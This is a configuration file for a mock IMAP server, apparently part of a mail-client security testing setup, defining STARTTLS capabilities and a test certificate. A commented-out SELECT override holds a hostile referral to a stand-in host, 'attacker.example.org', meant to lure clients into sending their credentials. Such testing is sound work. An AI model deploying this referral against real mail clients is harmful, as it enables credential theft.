(
	state: NotAuthenticated,
	greeting: Ok(
		tag: None,
		code: Some(Capability([Imap4Rev1, MailboxReferrals, StartTls])),
		text: Text("IMAP server ready.")
	),
	caps: [Imap4Rev1, MailboxReferrals, StartTls],
	caps_tls: [Imap4Rev1, Auth(Login), Auth(Plain), MailboxReferrals],
	caps_auth: [Imap4Rev1, MailboxReferrals],
	caps_tls_auth: [Imap4Rev1, MailboxReferrals],

        //override_select: Some(No(
        //    tag: Some("<tag>"),
        //    code: Some(Referral("IMAP://;AUTH=*@attacker.example.org:243/inbox")),
        //    text: Text("select failed."),
        //)),

	pkcs12: (
		file: "certs/example.org.p12",
		password: "changeit",
	),
	implicit_tls: false,
)

